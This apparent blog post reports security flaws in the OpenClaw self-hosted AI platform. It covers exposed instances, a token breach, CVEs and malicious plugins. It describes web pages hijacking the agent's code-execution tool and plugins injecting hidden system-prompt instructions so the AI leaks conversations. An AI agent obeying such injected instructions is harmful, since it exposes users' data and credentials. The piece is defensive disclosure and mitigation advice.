Tiamat

Posted on Mar 7

OpenClaw Is a Security Catastrophe: 42,000 Exposed Instances, 1.5M Leaked Tokens, and Why AI Privacy Matters

#cybersecurity #ai #privacy #security

You trusted it with your medical questions, your legal problems, your source code, your company's internal strategy. You ran it on your own hardware specifically so no one else could read those conversations. Then someone typed http.title:"OpenClaw" port:3000 into Shodan, and your instance was the fourth result.

This is the story of how the most popular self-hosted AI platform became the largest security incident in sovereign AI history — and what it reveals about the dangerous gap between privacy as a marketing claim and privacy as an architectural reality.

The Sovereign AI Promise

OpenClaw launched with a compelling pitch at exactly the right moment. As public trust in large AI providers eroded — driven by concerns about training data harvesting, conversation logging, and opaque data retention policies — a growing community of developers, enterprises, privacy researchers, and security-conscious users began looking for alternatives. OpenClaw gave them one.

Run your own AI. On your own hardware. Your data never leaves your control.

That promise resonated. Hard. Within eighteen months of launch, OpenClaw had cleared 2 million installs across developer machines, enterprise servers, hospital networks, and government workstations. The pitch was clean: instead of routing your most sensitive queries through OpenAI's servers or Anthropic's infrastructure, you run the orchestration layer yourself. You supply your own API keys. Your conversations live in a local SQLite database. Nobody else touches them.

For users with legitimate privacy needs — healthcare workers discussing patient cases with an AI assistant, lawyers reviewing privileged documents, security researchers handling sensitive vulnerability data, enterprises protecting proprietary source code — OpenClaw felt like the responsible choice.

The problem wasn't the premise. Self-hosted AI can be more private than managed services, under the right conditions. The problem was the implementation. OpenClaw shipped with an architecture that assumed users would handle their own security hardening, defaulted to no authentication for ease of setup, and built a plugin ecosystem with essentially no security review. Then it got popular fast, in exactly the population least likely to read the security documentation carefully.

The result is a catastrophe still unfolding in real time.

The Scale of the Exposure

Security researchers scanning the public internet with Shodan and BinaryEdge have identified more than 42,000 OpenClaw instances reachable from the open internet. Of those, 93% exhibit critical authentication bypass — meaning any unauthenticated user on the internet can walk directly into the full interface, read every stored conversation, extract every credential, and in many cases execute arbitrary commands on the underlying host.

Forty-two thousand instances. Ninety-three percent compromised by default.

To be precise about what that means: an unauthenticated attacker reaching one of these instances doesn't just see a login form they can try to brute-force. They see the complete application — conversation history going back months or years, all stored API keys for every connected service, OAuth tokens for Gmail, Slack, GitHub, and Notion, system prompts revealing how the user has configured their AI agent, uploaded documents the AI was asked to analyze, and in deployments with browser agent capabilities, a full history of URLs and page content the AI browsed on the user's behalf.

The contents of these exposed instances are extraordinarily sensitive. Because users trusted the platform with their most private queries. Health questions they wouldn't ask a doctor in person. Legal situations they haven't told their families about. Financial stress that would embarrass them professionally. Business strategies, acquisition plans, personnel decisions. Source code for unreleased products. Credentials for internal systems. The complete picture of a user's private intellectual life, laid out in readable text, accessible without a password.

The Moltbook Breach

The individual instance exposure would be damaging enough. Then came Moltbook.

Moltbook is a managed OpenClaw hosting provider — one of several companies that emerged to serve users who wanted the privacy pitch without the self-hosting complexity. Pay a monthly fee, get a managed OpenClaw instance. Your data stays on Moltbook's servers, not OpenAI's. For many users, this felt like a reasonable compromise.

In January 2026, a misconfiguration in Moltbook's backend infrastructure exposed a storage bucket containing 1.5 million API tokens and 35,000 user email addresses in a single incident. The tokens included live OpenAI API keys, Anthropic API keys, and OAuth tokens for connected services. Moltbook disclosed the breach 19 days after discovery — a timeline that security researchers criticized as dangerously slow given the sensitivity of active API credentials.

The Moltbook breach illustrates a recursive irony at the heart of the managed self-hosted market: users chose Moltbook specifically to avoid trusting a large AI provider with their data, then trusted a smaller, less-resourced company with worse security practices and a smaller incident response team. At least OpenAI has a dedicated security engineering organization. Moltbook had a misconfigured S3 bucket.

Security researcher Maor Dayan, who has been documenting OpenClaw's security posture since mid-2025, described the Moltbook incident as "the largest security incident in sovereign AI history" — a title that, given OpenClaw's trajectory, may not hold for long.

The CVEs: Technical Breakdown

The exposure problem is serious. The underlying CVEs make it catastrophic.

CVE-2026-25253 (CVSS 8.8): WebSocket Token Hijack Leading to Remote Code Execution

This is the one that ends careers.

OpenClaw's architecture includes a browser extension that communicates with the local desktop application via a persistent WebSocket connection. This connection is how the browser extension passes page content to the AI agent, receives responses, and triggers tool calls including — critically — OpenClaw's built-in code execution capability, which allows the AI to run terminal commands on the host machine.

The vulnerability: the WebSocket connection performs no origin validation. Any JavaScript running in any browser tab can send messages to the OpenClaw WebSocket on ws://localhost:40080. This isn't a theoretical attack surface. It's a one-liner.

The attack chain is straightforward and requires exactly one action from the victim: visiting a malicious webpage.

User has OpenClaw desktop app running with browser extension active (the default, advertised workflow)
User navigates to a malicious website — phishing link, malvertising, compromised legitimate site, anything
Malicious JavaScript on the page sends crafted WebSocket messages to ws://localhost:40080
Messages hijack the active OpenClaw session
Attacker-controlled message triggers OpenClaw's code execution tool with arbitrary shell commands
Full shell access on the victim's machine. No interaction beyond page load.

Maor Dayan demonstrated this attack in a four-minute video that circulated through security communities in February 2026. In the video, Dayan visits a controlled malicious page, and within seconds has an interactive shell running on the target machine — reading /etc/passwd, creating files, establishing a reverse shell. The video is technically unremarkable in its simplicity, which is precisely what makes it damning. There's no exploitation of obscure memory corruption. No kernel vulnerability. Just: send WebSocket messages, execute commands.

The CVSS 8.8 score (High) reflects the attack's low complexity, no-privileges-required posture, and high impact across confidentiality, integrity, and availability.

OpenClaw partially addressed this in v0.9.7, adding basic WebSocket message validation. But WebSocket authentication remains disabled by default, and the validation can be bypassed in configurations where users have relaxed CORS settings — which the OpenClaw documentation explicitly recommends for certain enterprise deployment patterns. Partial patches for architectural security flaws are not fixes. They're noise.

In enterprise environments, the implications extend beyond the compromised workstation. If the machine running OpenClaw has network access to internal infrastructure — and enterprise machines do — the attacker's shell is a pivot point. Active Directory, internal APIs, source control, CI/CD pipelines, database servers. The attack surface is whatever the OpenClaw host can reach.

CVE-2026-27487: macOS Keychain Command Injection

OpenClaw on macOS includes keychain integration, enabled by default, that retrieves stored credentials from the system keychain for use in AI-powered workflows. The integration calls macOS security command-line utilities to access keychain items, constructing the command string by interpolating keychain entry names.

Those entry names are not sanitized.

A malicious keychain entry — created by another compromised application, by a malicious OpenClaw plugin (more on those shortly), or by any process with keychain write access — can inject shell metacharacters into the command string that OpenClaw constructs when it calls the keychain retrieval utility. The result is command injection at the privilege level of the OpenClaw process, which on most macOS installations runs as the user account — meaning full user-level code execution with access to all user files, persistent launch agents, and every credential stored in the keychain.

This isn't a remote vulnerability. It requires either local access or the ability to write a malicious keychain entry through another vector. But on a machine that has already been touched by CVE-2026-25253 — the WebSocket RCE — the attacker has a shell. From that shell, writing a malicious keychain entry is trivial. CVE-2026-27487 then escalates whatever partial access an attacker had into credential exfiltration and persistent access.

The two CVEs chain. Dayan's demonstration video shows this exact sequence: WebSocket hijack for initial access, malicious keychain entry for persistence and credential exfiltration.

Affected: all macOS OpenClaw installations with keychain integration enabled. Keychain integration is enabled by default. There is no patch for CVE-2026-27487 at time of writing.

ClawHub: The Malicious Plugin Problem

OpenClaw's plugin ecosystem — ClawHub — hosts more than 50,000 published skills and plugins. These range from productivity tools and API integrations to custom AI agents, document processors, and workflow automations. The marketplace is central to OpenClaw's value proposition: users can extend their AI assistant with community-built capabilities.

In Q4 2025, Snyk conducted a security audit of 10,000 ClawHub skills. The results are staggering.

36.82% of scanned skills had at least one security flaw. Of those, 341 were explicitly malicious — not poorly written, not accidentally insecure, but deliberately designed to steal credentials, exfiltrate data, deliver malware, or create persistent access mechanisms on the host machine.

To contextualize that number: Google Play's malware rate, after years of investment in automated scanning, human review, and the Play Protect system, sits around 0.04%. Apple's App Store is approximately 0.02%. ClawHub's confirmed malicious rate is roughly 900 times worse than either established app marketplace.

The Snyk audit documented specific malicious behaviors found in ClawHub plugins:

Silent API key exfiltration. Several skills, presented as AI workflow tools, read OpenClaw's configuration database and silently transmitted stored API keys to attacker-controlled endpoints on installation or first use. The exfiltration was designed to look like normal API traffic, firing on HTTPS POST requests that appeared superficially similar to legitimate telemetry.

System prompt injection and exfiltration. Skills that modify the system prompt — a legitimate capability for customizing AI behavior — were found to include hidden instructions that caused the AI to repeat sensitive conversation content in formats easily parsed by a secondary exfiltration mechanism.

Persistence after uninstall. Multiple "productivity" plugins installed launch agents, cron jobs, or launchd plists that survived the plugin uninstall process, maintaining callback channels to attacker infrastructure even after users believed they had removed the tool.

Fake security scanners. In what might be the most brazen finding in the audit, several skills presented themselves as OpenClaw security scanners — tools that would audit your configuration for vulnerabilities — and used the privileged access granted during the "security scan" to do precisely the opposite: extract credentials, inventory connected services, and report findings to attacker infrastructure.

OpenClaw's review process for ClawHub submissions is: community flagging, no automated scanning, no code review for most submissions. Anyone can publish a skill. Once published, a skill surfaces in marketplace search. The only quality gate is whether other users flag it as problematic — a reactive, crowd-sourced security posture applied to a marketplace hosting tools that run with full access to the AI agent's credential store and code execution capabilities.

This is not a plugin security problem. This is a supply chain security problem. Every ClawHub install is an unreviewed third-party code execution on the host machine, with access to every credential OpenClaw holds. Thirty-six percent of them are broken. Three hundred forty-one of them are weapons.

The Privacy Paradox

Here is the central, painful irony of the OpenClaw situation: the users most harmed by these vulnerabilities are the ones who were most thoughtful about privacy.

A user who just uses ChatGPT sends their conversations to OpenAI. OpenAI has a documented data handling policy, a security team, SOC 2 certification, GDPR compliance infrastructure, and regulatory accountability. You might not trust them. You probably shouldn't trust them blindly. But the attack surface for a third party stealing your ChatGPT conversations requires compromising OpenAI's infrastructure — a hard target.

An OpenClaw user concerned enough about privacy to self-host a complex AI stack has, without realizing it, created a different threat model. Their conversations live in a plaintext SQLite database on a machine they manage. That machine is accessible on port 3000. It has no authentication. It's running a WebSocket service with no origin validation. It's loaded with community plugins from a marketplace with a 36.82% flaw rate.

They've traded a hard target for an easy one, in exchange for a privacy promise the architecture cannot keep.

The Shodan query is not secret knowledge. http.title:"OpenClaw" port:3000 returns thousands of results to anyone with a free account. Security researchers use it. Penetration testers use it. Opportunistic attackers use it. The query is posted openly in security community forums with commentary that is decidedly not defensive in character.

What those exposed instances contain is the complete private intellectual life of people who specifically wanted privacy. Health questions they researched with AI assistance — symptoms, medications, diagnoses, mental health. Legal situations they couldn't afford to discuss with a lawyer, so they used AI instead. Financial stress — debt calculations, bankruptcy questions, desperate budget planning. Source code for products not yet announced. Business strategy documents. Personnel decisions about employees. The specific operational details that distinguish valuable corporate intelligence from noise.

The Moltbook breach made this concrete. 35,000 email addresses are identifiable humans who trusted Moltbook with their private AI conversations. 1.5 million API tokens include the live credentials for their connected services. The breach exposed not just their AI conversations but the keys to their email, their code repositories, their productivity tools — everything the AI was connected to.

Why This Keeps Happening: The Self-Hosted AI Security Problem

OpenClaw's failures aren't unique. They are structurally predictable.

Self-hosted AI is architecturally complex. A typical OpenClaw deployment involves: the core application server, a local or remote inference endpoint, a plugin runtime, a database layer, optional browser extension integration, optional agent capabilities with code execution, and network configuration to make it accessible where the user needs it. Each component is a potential vulnerability surface. Each integration between components is a trust boundary that can be misconfigured.

The average OpenClaw user is not a sysadmin. They're a developer, a researcher, an enthusiast. They're technically sophisticated enough to install and run a complex application. They are not necessarily equipped to reason carefully about network exposure, authentication configuration, plugin supply chain security, and WebSocket origin policies simultaneously. The documentation assumes they will. The defaults don't enforce it.

The "run it on your home network" use case — the one OpenClaw's setup guides walk users through — becomes the "accidentally exposed to the internet" use case through multiple common paths. Residential ISPs with carrier-grade NAT that users think blocks inbound connections but doesn't on all ports. VPN configurations that expose the local network. Port forwarding set up for remote access and then forgotten. Tailscale or Cloudflare Tunnel configurations that expose more than intended. Cloud VM deployments where the user forgot to configure firewall rules.

The setup documentation notes that "you may want to configure authentication before exposing OpenClaw to external networks." This is an understatement of clinical proportions. Authentication should be required by default, with a prominently documented process to disable it for explicitly local-only use. Instead, the defaults optimize for the fastest possible path to a working AI assistant, and security configuration is downstream of that experience.

Enterprise deployments present a different failure mode. IT departments approved self-hosted OpenClaw for compliance reasons — "our AI data stays in our infrastructure, not with a third-party provider." This is a legitimate compliance argument. But compliance and security are not synonyms. An enterprise OpenClaw instance with no authentication, loaded with unreviewed plugins, running with code execution enabled, on a machine with broad network access to internal infrastructure, is not a privacy improvement over a managed AI service. It is a high-privilege foothold waiting to be exploited.

The Credential Exposure Problem

OpenClaw stores connected service credentials in plaintext in its SQLite database. No encryption at rest. No key management. The credentials for every service a user has connected — OpenAI, Anthropic, Google, Slack, Gmail, GitHub, Notion, and any other integration — are readable by any process that can open the database file.

On an exposed instance with authentication bypass, this means the credential exfiltration step requires a single API call. Read the configuration endpoint. Parse the JSON. You have the keys.

The downstream consequences are layered.

With stolen API keys, an attacker can run inference on the victim's API account — burning through their credit balance with arbitrary requests, potentially submitting malicious prompts through the victim's authenticated account to explore provider security boundaries, or simply selling the keys on markets where active AI API credentials trade for significant sums.

With stolen OAuth tokens, the attacker has access to every connected service. Gmail tokens grant email access. GitHub tokens grant code repository access. Slack tokens grant workspace access. Notion tokens grant document access. The AI assistant was connected to these services to be useful. It had broad permissions. Those permissions are now the attacker's.

With RCE via CVE-2026-25253, the attacker has shell access and can exfiltrate the entire credential store, not just what's exposed through the application interface. They can install persistence mechanisms, establish reverse shells, and — in enterprise environments — use the compromised host as a pivot point for lateral movement through the internal network. OpenClaw agents in enterprise settings often hold credentials for internal developer tools, CI/CD systems, internal APIs, and database access tokens. The chain from "WebSocket message" to "inside the corporate network" can be traversed in minutes.

The AI Training Data Risk

The credential and conversation exposure from active exploitation is the acute risk. There's a chronic risk operating quietly beneath it.

Many OpenClaw plugins connect to third-party AI providers for specific capabilities — translation, image analysis, specialized domain models. Users configure these plugins believing they're running local AI. They often aren't. The plugins route to cloud APIs, and many of those APIs have training data policies that are, at best, ambiguous about what happens to user queries.

Users say things to their "private" AI assistant that they say specifically because they believe it's private. Medical symptoms that haven't been discussed with a doctor yet. Legal situations at a stage where privilege matters. Financial calculations involving specific account balances and debt structures. Relationship details. Business plans. The granular texture of someone's private life, provided to an AI precisely because the alternative was telling a human.

The 341 malicious ClawHub skills identified by Snyk may be specifically designed to harvest this content. Sensitive conversation data from users who self-selected for privacy concerns is an extraordinarily valuable training signal. Users willing to discuss their medical situations, legal problems, and financial stress with an AI assistant are providing exactly the emotionally and situationally rich dialogue that AI companies need to train systems that handle sensitive human situations well. And those users, by definition, have low tolerance for sharing that data with AI companies — making organic acquisition impossible, making covert exfiltration via a compromised plugin attractive.

The privacy paradox is complete: users self-hosted specifically to prevent AI training on their private conversations, and may have inadvertently delivered exactly that data to parties motivated to use it.

What Real Privacy-First AI Architecture Looks Like

The OpenClaw failures don't indict self-hosted AI. They indict a specific implementation of it. The architecture for genuinely privacy-respecting AI deployment exists and has known properties. OpenClaw just didn't build it.

Zero-trust architecture treats every component as potentially compromised and every communication as untrusted until verified. No component talks to another without authentication. The WebSocket connection between browser extension and desktop app authenticates with a session token generated at startup and verified on every message. Origin validation is enforced, not optional.

Encrypted credential storage is non-negotiable. API keys and OAuth tokens are encrypted at rest using keys derived from user-controlled secrets, ideally managed via HSM or OS-level secure enclaves. Plaintext credential storage in SQLite is not an oversight — it's an architectural choice, and it's the wrong one.

PII scrubbing before any external API contact means that conversation content never reaches a third-party endpoint without being processed by a scrubber that identifies and redacts sensitive entities — names, email addresses, phone numbers, account numbers, medical identifiers, and other sensitive patterns. The scrubber runs at the boundary between the local system and any external service. This makes plugin-based exfiltration dramatically harder: even if a plugin has unauthorized API access, the data it sees has been stripped of the highest-value sensitive content.

Plugin sandboxing limits what a skill can do regardless of what its code attempts. A plugin that processes text should not have filesystem access. A plugin that makes API calls should be limited to a pre-approved list of endpoints. No plugin should have access to the credential store. These constraints need to be enforced at the runtime level, not left to plugin authors to respect voluntarily. ClawHub's current model — unrestricted plugin execution with no automated security review — produces exactly the 341 malicious skills Snyk documented.

Network isolation separates the AI reasoning engine from the credential store. The component that calls external AI APIs should not be the same component that holds keys for connected services. Compromise of the inference pathway should not automatically yield credential access. These are different security domains and should be separated architecturally.

Audit logging makes every AI action reviewable. Every tool call. Every external API request. Every file read or write. Every credential access. The log should be tamper-evident and separately stored from the components it audits. If an AI agent does something it shouldn't — because of a compromised plugin, a jailbreak, or an attacker controlling the session — the audit log is the forensic record that makes incident response possible.

The privacy proxy pattern is the architectural approach that bundles these properties together coherently. Rather than exposing a complex AI stack directly to any network, all external-facing access routes through a dedicated proxy layer that handles authentication, PII scrubbing, credential management, rate limiting, and provider routing. The complex, sensitive internals never touch the network directly. The proxy is a narrow, well-audited surface area. Compromise of the proxy does not automatically yield access to the AI agent's credential store or conversation database.

This architecture is more complex to build than "run the app, open the port." It requires engineering investment. It requires security expertise in the design phase. It requires a commitment to treating privacy as an architectural property rather than a checkbox in the marketing copy.

OpenClaw made different choices. The result is 42,000 exposed instances and counting.

What Users Should Do Right Now

If you are running an OpenClaw instance, the following actions are not optional.

Check your exposure immediately. Run curl -s http://localhost:3000/api/config from the machine running OpenClaw. If you get a response without authentication, you are exposed to anyone who can reach that port. Then check whether port 3000 is reachable from outside your local network. If you're unsure, use an external port scanner against your public IP.

Rotate every API key stored in OpenClaw. Treat all of them as compromised. Go to OpenAI, Anthropic, Google Cloud, and every other provider you've connected, generate new API keys, and revoke the old ones. Do the same for OAuth tokens — revoke and reauthorize every connected service. If your credentials were in an exposed instance for any period of time, assume they've been read.

Audit your installed skills against the Snyk malicious skill list. Snyk has published indicators of compromise for the 341 confirmed malicious skills, including plugin IDs, hash values, and behavioral signatures. Cross-reference your installed plugins. If you have any of the flagged skills installed, uninstall them and then check for persistence mechanisms — cron jobs, launch agents, systemd services — that may have survived uninstall.

Update to v0.9.7 immediately, understanding that this provides partial mitigation for CVE-2026-25253 only and does not address CVE-2026-27487, the plaintext credential storage issue, or the plugin supply chain problem. The update is necessary but not sufficient.

Enable authentication if you must expose OpenClaw to any network. The documentation covers this. Do it. Then reconsider whether the exposure is necessary at all — the safest OpenClaw configuration is localhost-only, with no external network access, no browser extension WebSocket endpoint, and code execution disabled unless explicitly needed.

For enterprise deployments: escalate this to your security team immediately. OpenClaw deployments in enterprise environments should be treated as potentially compromised and audited against the Snyk findings. Assess lateral movement risk from any host running OpenClaw with code execution enabled.

The Bigger Lesson

OpenClaw's security crisis is not an OpenClaw story. It's an AI industry story.

The privacy promises that drove OpenClaw's adoption were never false in intent. The developers who built it genuinely believe in user data sovereignty. The users who installed it made reasonable choices based on the information available. The managed hosting providers who built on top of it were trying to solve a real problem.

What went wrong is that privacy was treated as a feature rather than an architectural constraint. Privacy as a feature means you add authentication to the setup guide and call it privacy-preserving. Privacy as an architectural constraint means you assume breach, encrypt everything, separate security domains, require authentication by default, and treat every external integration as a potential vector.

The gap between those two approaches, at 2 million installs, with users who specifically entrusted the platform with their most sensitive data, is 42,000 exposed instances, 1.5 million leaked tokens, a CVSS 8.8 one-click RCE, and a plugin marketplace that is statistically more likely to contain malware than legitimate security software.

"Self-hosted equals private" is a dangerous oversimplification. Self-hosted can be more private. Or it can create far greater exposure than the managed alternative, because the attack surface is in your hands and you are not a security organization. The outcome depends entirely on the quality of the architecture and the security practices of the operator. OpenClaw optimized for adoption and ease of setup. The security consequences were predictable — and predicted, by researchers who raised these issues in the OpenClaw GitHub repository months before Maor Dayan's RCE demonstration went viral.

The path forward is not abandoning self-hosted AI. It is building it correctly: zero-trust internal architecture, encrypted credential storage, PII scrubbing at external boundaries, sandboxed plugin execution, mandatory authentication, narrow network exposure, and audit logging. It is treating security architecture as a prerequisite for the privacy promise rather than an afterthought to it.

The users who chose OpenClaw for privacy deserve an AI platform that delivers it architecturally. What they got was a plaintext SQLite database behind an unauthenticated port. The next sovereign AI platform needs to do better — not in the documentation, but in the defaults.

If you are evaluating self-hosted AI platforms, demand answers to the following before deployment: How are credentials stored? What authentication is enforced by default? How are plugins reviewed and sandboxed? What is the network exposure of each component? What audit logging exists? If the answers are "plaintext," "none," "community flagging," "everything on one port," and "none" — you have your answer.

The privacy-first AI infrastructure problem is solvable. OpenClaw just demonstrated, at scale, what happens when it isn't solved. That demonstration should drive the next generation of tools to build security into the architecture from day one — not as a promise in the readme, but as a constraint enforced by the system itself.

CVE details sourced from NVD advisories CVE-2026-25253 and CVE-2026-27487. Snyk audit findings published Q4 2025. Moltbook breach details from public disclosure. Maor Dayan's research and demonstration video circulated February 2026. Shodan scan methodology and instance counts from BinaryEdge public reporting.

Tags: security, ai, privacy, infosec, openclaw, vulnerability, self-hosted

DEV Community